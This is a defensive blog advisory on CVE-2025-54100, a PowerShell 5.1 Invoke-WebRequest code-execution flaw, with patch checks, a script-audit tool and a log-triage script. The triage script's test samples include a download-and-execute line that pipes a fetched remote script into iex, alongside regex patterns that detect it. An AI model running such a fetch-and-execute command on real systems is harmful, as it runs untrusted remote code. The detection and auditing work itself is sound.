PowerShell’s Hidden Power: Why CVE-2025-54100 Demands Immediate Action

Published by Brav

TL;DR

  • CVE-2025-54100 is a high-severity remote code execution bug in Windows PowerShell 5.1: a crafted web page fetched with Invoke-WebRequest (or its curl, wget and iwr aliases) without -UseBasicParsing can run attacker-supplied script on the machine that fetched it.
  • The code runs locally with the privileges of the user who ran the fetch; the proof-of-concept behaviour described below launched the Windows calculator and opened dozens of browser tabs.
  • Microsoft released a security update (KB5074204) that adds a confirmation prompt before the page is parsed and recommends the -UseBasicParsing switch.
  • The KB5074204 article covers OS builds 26100.7392 (Windows 11 24H2 and Windows Server 2025) and 26200.7392 (Windows 11 25H2); Windows 10 and Windows Server 2022 are also affected and receive their own updates.
  • If you are not yet patched or run custom PowerShell scripts, update as soon as possible and avoid the curl alias unless you pass -UseBasicParsing.

Why this matters

I’ve spent more than two decades writing PowerShell scripts to automate backups, patch deployments and ad-hoc queries, so CVE-2025-54100 hit close to home. This is not a trivial bug: it is a command-injection flaw in which fetching a crafted web page from a PowerShell session is enough for attacker-supplied code to run locally, with the rights of the user who ran the fetch. On Windows 10 and 11 machines that rely on the built-in PowerShell 5.1, the curl alias (which maps to Invoke-WebRequest) is a silent accomplice. Once I saw that a single line such as curl http://localhost, pointed at a crafted test page, could launch the Windows calculator or open dozens of browser tabs, the stakes were clear: a script can be hijacked by a malicious page with no user action beyond running the script.

This vulnerability affects any environment where PowerShell 5.1 is used for automation, especially in enterprise or IT-managed settings. It also demonstrates how a seemingly innocuous alias can create a security blind spot, a lesson that applies to many “built-in” conveniences.

Core concepts

Parameter                         Use case                                        Limitation
No special flags (default)        Quick download; full DOM built by the IE engine Script in the page may run during parsing (RCE risk)
-UseBasicParsing                  Safe fetch; no HTML engine, no script runs      No ParsedHtml or Forms collection, so DOM-walking scripts need rewriting
Confirmation prompt (KB 5074204)  Interactive safety check                        Needs a user at the console; answering "Yes" re-enables the risk

1. Remote code execution via command injection

The CVE entry classifies the flaw as improper neutralization of special elements in a command (command injection). Without -UseBasicParsing, Invoke-WebRequest hands an HTML response to the Internet Explorer HTML engine to build the ParsedHtml DOM, and script embedded in the page may run during that parsing. An attacker who controls the page can therefore place script in it that ends up executing commands (Invoke-Expression, its IEX alias, or a plain calc.exe call) on the machine that fetched the page, in the security context of the user who ran the fetch. The entry summarises the impact as "an unauthorized attacker can execute code locally" (Microsoft — CVE-2025-54100 Detail, 2025).

2. The curl alias is the gateway

Windows PowerShell 5.1 includes several aliases that map to web-request cmdlets: curl, wget, iwr, etc. The curl alias is a direct alias to Invoke-WebRequest. If you run curl http://example.com, PowerShell internally executes Invoke-WebRequest. The vulnerability is triggered whenever this cmdlet is invoked without the -UseBasicParsing switch, because the old DOM parser is used. Microsoft’s KB 5074204 added an interactive prompt that warns users of the risk Microsoft — KB5074204: Security Update for Windows PowerShell (OS Builds 26100.7392 and 26200.7392) (2025).

The alert states: “Script code in the page might be run during parsing.” The user can choose to proceed (risk) or cancel (safe).

3. Practical implications

  • Calculator launch – the injected script starts calc.exe, the classic proof that arbitrary code ran.
  • Browser tab flood – the injected script opens a new tab per line, exhausting memory and freezing the desktop.
  • Java JNLP or Steam protocol – not part of the original report, but once arbitrary code runs it can start any registered URI handler, for example jnlp: for Java applications or steam: for Steam games.

These side-effects are just manifestations of the core vulnerability: executing arbitrary code.

How to apply it

Below is a pragmatic, step-by-step approach to mitigate the risk.

  1. Check your system build

    • Open PowerShell and run winver; the dialog shows the version and the OS build (build.revision).
    • The patched builds named in KB 5074204 are 26100.7392 (Windows 11 24H2 and Windows Server 2025) and 26200.7392 (Windows 11 25H2).
    • Windows 10 (build 19045) and Windows Server 2022 (build 20348) are patched by their own updates; find the matching KB in the CVE-2025-54100 entry rather than comparing against the numbers above.
    • If your revision is below the patched one, apply the update as soon as possible or plan an OS upgrade.
  2. Confirm KB 5074204 is installed

    • Run Get-HotFix | Where-Object { $_.HotFixID -eq 'KB5074204' }.
    • Get-HotFix reads the Win32_QuickFixEngineering class, which does not list every kind of update, so cross-check the OS build from step 1.
    • If it is missing, run Windows Update or download the package from the Microsoft Update Catalog.
  3. Replace the curl alias with a safe wrapper (quick workaround)

    # Aliases win over functions in command lookup and cannot add parameters,
    # so remove the alias first, then shadow the name with a function that forces basic parsing.
    Remove-Item Alias:curl -Force
    function curl { Invoke-WebRequest -UseBasicParsing @args }
    # Do the same for wget and iwr if your scripts use them, and put this in $PROFILE
    # (or a machine-wide profile): the change only lasts for the current session otherwise.
    

    With the wrapper in place, existing scripts that call curl keep working but can no longer reach the IE parser. If you remove the alias without adding the function, curl resolves to curl.exe (shipped with Windows 10 1803 and later), which takes different arguments, so test your scripts either way.

  4. Use the -UseBasicParsing switch

    curl -UseBasicParsing http://example.com
    

    This bypasses the old DOM parser and stops scripts from executing. It’s the safest option for scripts that only need raw content.

  5. Adopt the security prompt

    • After installing KB 5074204, the prompt appears automatically.
    • Make it a policy: if you ever see the prompt, choose “No” and re-run with -UseBasicParsing.
  6. Audit your scripts

    • Search for every Invoke-WebRequest, curl, wget and iwr call, including splatted parameter sets that may hide the switch.
    • Replace them with Invoke-WebRequest -UseBasicParsing.
    • Review any script that processes web content, and never pipe fetched content into Invoke-Expression.
  7. Monitor for malicious activity

    • Enable PowerShell script block logging (Group Policy: Turn on PowerShell Script Block Logging, or the EnableScriptBlockLogging value under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging). PSReadLine history is a convenience file a user can edit or delete, not an audit log.
    • Watch the Microsoft-Windows-PowerShell/Operational log (event ID 4104) for web-request commands without -UseBasicParsing and for fetched content handed to IEX or Invoke-Expression.
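The following script is an added example and not code from the original post. It covers steps 1, 2 and 6 in one run: it reads the OS build and revision from the registry, checks for KB5074204, and audits .ps1/.psm1 files with PowerShell's own parser (the AST) for Invoke-WebRequest calls, including the curl, wget and iwr aliases, that do not pass -UseBasicParsing. The revision threshold 7392 for builds 26100 and 26200 is taken from the KB5074204 title cited above; any other build is reported as "CheckCveEntry" rather than guessed. The sample script it audits is constructed here so the audit has findings to show offline.

```powershell
# Added example (not from the original post): build check, KB check and AST audit.
[CmdletBinding()]
param([string]$ScriptRoot = (Join-Path $env:TEMP 'iwr-audit-sample'))

function Get-OsPatchStatus {
    $cv    = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [int]$cv.CurrentBuild
    $ubr   = [int]$cv.UBR                      # update build revision, e.g. 7392
    $fixed = @{ 26100 = 7392; 26200 = 7392 }   # from the KB5074204 title (assumption: only these builds)
    $state = 'CheckCveEntry'
    if ($fixed.ContainsKey($build)) {
        $state = if ($ubr -ge $fixed[$build]) { 'Patched' } else { 'NeedsUpdate' }
    }
    [pscustomobject]@{
        Build     = "$build.$ubr"
        State     = $state
        # Get-HotFix reads Win32_QuickFixEngineering; cross-check with Build above
        KB5074204 = [bool](Get-HotFix -Id KB5074204 -ErrorAction SilentlyContinue)
    }
}

function Find-UnsafeWebRequest {
    param([Parameter(Mandatory)][string]$Path)

    $tokens = $null; $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseFile($Path, [ref]$tokens, [ref]$errors)
    if ($errors.Count) { Write-Warning "$Path has parse errors; results may be incomplete" }

    # Every command whose name is Invoke-WebRequest or one of its Windows PowerShell 5.1 aliases
    $calls = $ast.FindAll({
        param($node)
        $node -is [System.Management.Automation.Language.CommandAst] -and
        @('Invoke-WebRequest', 'curl', 'wget', 'iwr') -contains $node.GetCommandName()
    }, $true)

    foreach ($call in $calls) {
        $elements = $call.CommandElements
        # The switch may be abbreviated (-UseBasic), so match on the prefix
        $hasSwitch = $elements | Where-Object {
            $_ -is [System.Management.Automation.Language.CommandParameterAst] -and
            'UseBasicParsing'.StartsWith($_.ParameterName, [System.StringComparison]::OrdinalIgnoreCase)
        }
        # A splatted hashtable (@params) may carry the switch; flag it for manual review
        $splatted = $elements | Where-Object {
            $_ -is [System.Management.Automation.Language.VariableExpressionAst] -and $_.Splatted
        }
        if (-not $hasSwitch) {
            [pscustomobject]@{
                File    = $Path
                Line    = $call.Extent.StartLineNumber
                Command = $call.GetCommandName()
                Finding = if ($splatted) { 'ReviewSplat' } else { 'MissingUseBasicParsing' }
                Text    = $call.Extent.Text
            }
        }
    }
}

# Constructed sample script (not real data) so the audit has findings offline
$sampleDir = Join-Path $env:TEMP 'iwr-audit-sample'
New-Item -ItemType Directory -Path $sampleDir -Force | Out-Null
@'
$page = curl http://intranet.example/status         # unsafe: IE-based parser
$raw  = iwr -UseBasic http://intranet.example/raw   # safe: abbreviated switch
Invoke-WebRequest @params                           # needs review: splatted args
'@ | Set-Content -Path (Join-Path $sampleDir 'fetch-status.ps1') -Encoding ASCII

Get-OsPatchStatus | Format-List
Get-ChildItem -Path $ScriptRoot -Recurse -Include *.ps1, *.psm1 -File |
    ForEach-Object { Find-UnsafeWebRequest -Path $_.FullName } |
    Format-Table Line, Command, Finding, Text -AutoSize
```

Run it with -ScriptRoot pointing at your script repository to audit real code; the default audits only the constructed sample. The AST walk is preferred over a text search because it resolves command names per call, tolerates abbreviated switches and tells you when a splatted parameter set needs a human look instead of reporting a false "unsafe".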

Tip: If you write scripts, fetch only over HTTPS, do not hard-code plain-http URLs, and never hand downloaded content to Invoke-Expression; save it to disk, verify a known hash or Authenticode signature, and only then run it.
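For step 7, here is an added example (not code from the original post) that turns on script block logging and triages the resulting 4104 events. It uses regular expressions rather than the parser so it can sweep large volumes of log text quickly; the trade-off, stated in the comments, is that a real curl.exe invocation also matches, so hits are leads, not verdicts. The three script-block texts at the end are constructed here to show the triage logic working offline; the live hunt needs the policy key set from an elevated session first.

```powershell
# Added example (not from the original post): enable 4104 logging and triage the events.
function Enable-ScriptBlockLogging {
    # Same value the Group Policy "Turn on PowerShell Script Block Logging" sets; needs elevation
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Test-ScriptBlockText {
    # Returns a comma-joined list of findings for one script block, or $null if clean.
    # Regex triage: 'curl' also matches curl.exe, so treat hits as leads to review.
    param([Parameter(Mandatory)][string]$Text)
    $web      = '\b(Invoke-WebRequest|iwr|curl|wget)\b'
    $findings = New-Object System.Collections.Generic.List[string]

    # Fetched content handed straight to the expression evaluator
    if ($Text -match '(?i)\b(Invoke-Expression|iex)\b' -and $Text -match "(?i)${web}") {
        $findings.Add('DownloadAndExecute')
    }
    # Each web-request statement (up to the next ; | or newline) that carries no -UseBasic* switch
    foreach ($m in [regex]::Matches($Text, "(?i)${web}[^\r\n;|]*")) {
        if ($m.Value -notmatch '(?i)-UseBasic') {
            $findings.Add('WebRequestWithoutBasicParsing'); break
        }
    }
    if ($findings.Count) { $findings -join ',' } else { $null }
}

function Find-SuspiciousScriptBlocks {
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value      # 4104 property 2 is ScriptBlockText
        $hit  = Test-ScriptBlockText -Text $text
        if ($hit) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Finding = $hit
                Path    = $_.Properties[4].Value     # script path; empty for interactive input
                Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Offline check against constructed script-block texts (not real log entries)
$samples = @(
    'curl http://intranet.example/status | Out-File status.txt'
    'iex (iwr http://10.0.0.5/p.ps1 -UseBasicParsing).Content'
    'Invoke-WebRequest -UseBasicParsing https://example.test/a.txt'
)
foreach ($s in $samples) {
    [pscustomobject]@{ Sample = $s; Finding = (Test-ScriptBlockText -Text $s) }
}

# Live hunt once logging is on: Enable-ScriptBlockLogging (elevated), then
# Find-SuspiciousScriptBlocks -Hours 24 | Format-Table -AutoSize
```

The first sample trips the missing-switch rule, the second passes -UseBasicParsing but feeds the result to IEX, which is the download-and-execute pattern worth alerting on regardless of this CVE, and the third is clean. Forward the 4104 events to your SIEM and run the same two patterns there; script block logging records the de-obfuscated text that actually executed, which a PSReadLine history file never does.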

Pitfalls & edge cases

  • Windows Server editions – KB 5074204 itself targets builds 26100 and 26200, so it covers Windows Server 2025 but not Windows Server 2022 (build 20348) or older. Look up the update that matches those builds in the CVE-2025-54100 entry instead of assuming they are patched.
  • PowerShell 7 (formerly PowerShell Core) – Invoke-WebRequest there never uses the Internet Explorer engine (-UseBasicParsing is accepted only for compatibility and has no effect), and the curl and wget aliases were removed in PowerShell 6, so it is not affected.
  • Legacy scripts using iwr – The iwr alias also maps to Invoke-WebRequest, as does wget. Don’t assume either is safe.
  • Resource exhaustion – A page that opens a browser tab per line can freeze the machine. The KB 5074204 prompt only intercepts the parse; answering "Yes" runs the page’s script exactly as before, so pass -UseBasicParsing rather than relying on the prompt.
  • Non-Windows PowerShell – The flaw is specific to Windows PowerShell 5.1; PowerShell 7 on Linux or macOS is unaffected.

Quick FAQ

Q: Which Windows versions are affected?
A: Windows 10, Windows 11 and Windows Server 2022/2025 running Windows PowerShell 5.1. The KB5074204 article covers OS builds 26100.7392 (Windows 11 24H2 and Windows Server 2025) and 26200.7392 (Windows 11 25H2); other versions receive their own updates.

Q: What’s the exact CVE identifier?
A: CVE-2025-54100.

Q: Are there workarounds besides disabling curl?
A: Yes: pass -UseBasicParsing on every call, or install KB 5074204 and always answer "No" at the prompt.

Q: How quickly can I apply the patch?
A: Through Windows Update as soon as it is offered, or by manual download from the Microsoft Update Catalog.

Q: Does it affect PowerShell 7 or Linux?
A: No, only Windows PowerShell 5.1.

Q: How common is the curl alias usage?
A: curl, wget and iwr are default aliases in Windows PowerShell 5.1 and many scripts rely on them, so usage is widespread.

Q: What are the detailed mitigation steps?
A: See the "How to apply it" section above.

Conclusion

The CVE-2025-54100 flaw is a stark reminder that even well-trusted tools like PowerShell can harbor critical security gaps. If you run PowerShell 5.1 on Windows 10/11 or Windows Server, you’re on the front lines. The fix is simple: install KB 5074204, disable the curl alias or always use -UseBasicParsing, and audit any scripts that fetch web content. Act now—your system’s integrity depends on it.


Last updated: December 14, 2025